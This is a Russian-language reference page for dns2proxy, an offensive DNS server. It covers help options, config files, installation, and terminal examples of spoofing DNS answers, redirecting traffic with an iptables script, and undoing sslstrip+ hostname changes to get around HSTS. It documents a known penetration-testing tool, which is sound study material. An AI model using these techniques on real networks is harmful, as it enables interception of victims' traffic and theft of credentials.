You are here: Home » Sniffing и Spoofing » dns2proxy

dns2proxy

Описание dns2proxy

Это наступательный DNS сервер.

Этот инструмент предлагает различные функции последующей эксплуатации для жертвы, у которой вы изменили DNS.

Домашняя страница: https://github.com/singe/dns2proxy/ (доступный форк). Первоначально программа была опубликована автором по адресу https://github.com/LeonardoNve/dns2proxy, но из-за нового испанского закона, запрещающего публикацию "наступательных" инструментов/техник в сфере безопасности, он был вынужден удалить исходный код.

Автор: LeonardoNve

Лицения: GPLv3

Справка по dns2proxy

использование: 

dns2proxy.py [-h] [-N] [-i INTERFACE] [-u IP1] [-d IP2] [-I IPS] [-S]
                    [-A ADMINIP]

опциональные аргументы:

-h, --help показать справку и выйти

-N, --noforward DNS перенаправление OFF (по умолчанию ON)

-i ИНТЕРФЕЙС, --interface ИНТЕРФЕЙС Интерфейс для использования

-u IP1, --ip1 IP1 Первый IP для добавления в ответ

-d IP2, --ip2 IP2 Второй IP для добавления в ответ

-I IPS, --ips IPS Список из IP для добавления после ip1,ip2 разделяется запятой

-S, --silent Молчаливый режим

-A ADMINIP, --adminIP ADMINIP IP администратора, который не фильтровать

Руководство по dns2proxy

Страница man отсутствует.

Функция 1

Традиционный спуф DNS добавляет в ответ оригинальный IP адрес.

Использование spoof.cfg file:

hostname ip.ip.ip.ip

root@kali:~/dns2proxy# echo "www.s21sec.com 1.1.1.1" > spoof.cfg

// запустите в другом терминале dns2proxy.py

root@kali:~/dns2proxy# nslookup www.s21sec.com 127.0.0.1
Server: 127.0.0.1
Address: 127.0.0.1#53

Name: www.s21sec.com
Address: 1.1.1.1
Name: www.s21sec.com
Address: 88.84.64.30

или вы можете использовать файл domains.cfg, чтобы спуфить все хосты этого же домена:

root@kali:~/demoBH/dns2proxy# cat dominios.cfg
.domain.com 192.168.1.1

root@kali:~/demoBH/dns2proxy# nslookup aaaa.domain.com 127.0.0.1
Server: 127.0.0.1
Address: 127.0.0.1#53

Name: aaaa.domain.com
Address: 192.168.1.1

Имена хостов в nospoof.cfg не будут спуфиться.

Функция 2

Эта функция реализовывает атаку спуфинга DNS добавлением 2 IP адресов на верхушку запросов (резолюции) и настраивает систему следовать этим соединениям.

Вы можете посмотреть подробности в материалах BlackHat Asia 2014 OFFENSIVE: EXPLOITING DNS SERVERS CHANGES и в демо видео.

Для запуска этой атаки есть шеллскрипт, который автоматически настраивает систему использовать IP таблицы. Вы должны отредактировать этот файл, чтобы он подходил к вашей системе. НЕ ЗАБУДЬТЕ переменную AdminIP!!!!!

Оба IP должны быть должны быть в той же самой системе, чтобы позволить dns2proxy.py настроить форвардинг.

Использование:

ia.sh < интерфейс > [ip1] [ip2]
root@kali:~/dns2proxy# ./ia.sh eth0 172.16.48.128 172.16.48.230
Non spoofing imap.gmail.com
Non spoofing mail.s21sec.com
Non spoofing www.google.com
Non spoofing www.apple.com
Non spoofing ccgenerals.ms19.gamespy.com
Non spoofing master.gamespy.com
Non spoofing gpcm.gamespy.com
Non spoofing launch.gamespyarcade.com
Non spoofing peerchat.gamespy.com
Non spoofing gamestats.gamespy.com
Specific host spoofing www.s21sec.com with 1.1.1.1
Specific domain IP .domain.com with 192.168.1.1
binded to UDP port 53.
waiting requests.
Starting sniffing in (eth0 = 172.16.48.128)....

< в другом терминале >

root@kali:~/dns2proxy# nslookup www.microsoft.com 127.0.0.1
Server: 127.0.0.1
Address: 127.0.0.1#53

Name: www.microsoft.com
Address: 172.16.48.128
Name: www.microsoft.com
Address: 172.16.48.230
Name: www.microsoft.com
Address: 65.55.57.27

Скрипт fhtang.sh закроет программу и восстановит нормальные iptables.

Имена хостов в nospoof.cfg не будут спуфиться.

Функция 3

Этот dns сервер автоматически выявляет и корректирует изменения, которые делает sslstrip+ в именах хостов, чтобы избежать HSTS, поэтому будет отвечать должным образом.

Этот сервер необходим для выполнения атаки sslstrip+.

root@kali:~/dns2proxy# nslookup webaccounts.google.com 127.0.0.1 <-- DNS ответ вроде accounts.google.com
Server: 127.0.0.1
Address: 127.0.0.1#53

Name: webaccounts.google.com
Address: 172.16.48.128
Name: webaccounts.google.com
Address: 172.16.48.230
Name: webaccounts.google.com
Address: 74.125.200.84

root@kali:~/dns2proxy# nslookup wwww.yahoo.com 127.0.0.1 <-- Обрати внимание на 4 w! DNS ответ вроде
Server: 127.0.0.1 www.yahoo.com
Address: 127.0.0.1#53

Name: wwww.yahoo.com
Address: 172.16.48.128
Name: wwww.yahoo.com
Address: 172.16.48.230
Name: wwww.yahoo.com
Address: 68.142.243.179
Name: wwww.yahoo.com
Address: 68.180.206.184

Описание файлов конфигурации dns2proxy

domains.cfg (или dominios.cfg): резолвит все хосты, которые есть в списке доменов по списку IP

Пример: .facebook.com 1.2.3.4 .fbi.gov 1.2.3.4

spoof.cfg : Спуфит хосты с ip

Пример: www.nsa.gov 127.0.0.1

nospoof.cfg: Отправляет всегда легитимный ответ, когда запрашиваются эти хосты.

Пример. mail.google.com

nospoofto.cfg: Не отправлять фальшивые ответы по IP из этого списка.

Пример: 127.0.0.1 4.5.6.8

victims.cfg: Если не пусто, отправлять фальшивые ответы только по этим IP адресам.

Пример: 23.66.163.36 195.12.226.131

resolv.conf: DNS сервер для передачи запросов.

Пример: nameserver 8.8.8.8

Примеры запуска dns2proxy

Информация в данный раздел будет добавлена позже.

Установка dns2proxy

Установка в Kali Linux

apt-get install python-dnspython python-pcapy
git clone https://github.com/singe/dns2proxy.git
cd dns2proxy/
python ./dns2proxy.py

Установка в Debian, Ubuntu, Mint

sudo apt-get install python-dnspython python-pcapy
git clone https://github.com/singe/dns2proxy.git
cd dns2proxy/
sudo python ./dns2proxy.py

Информация об установке в другие операционные системы будет добавлена позже.

Скриншоты dns2proxy

Это утилита командной строки.

Инструкции по dns2proxy

Близкие программы: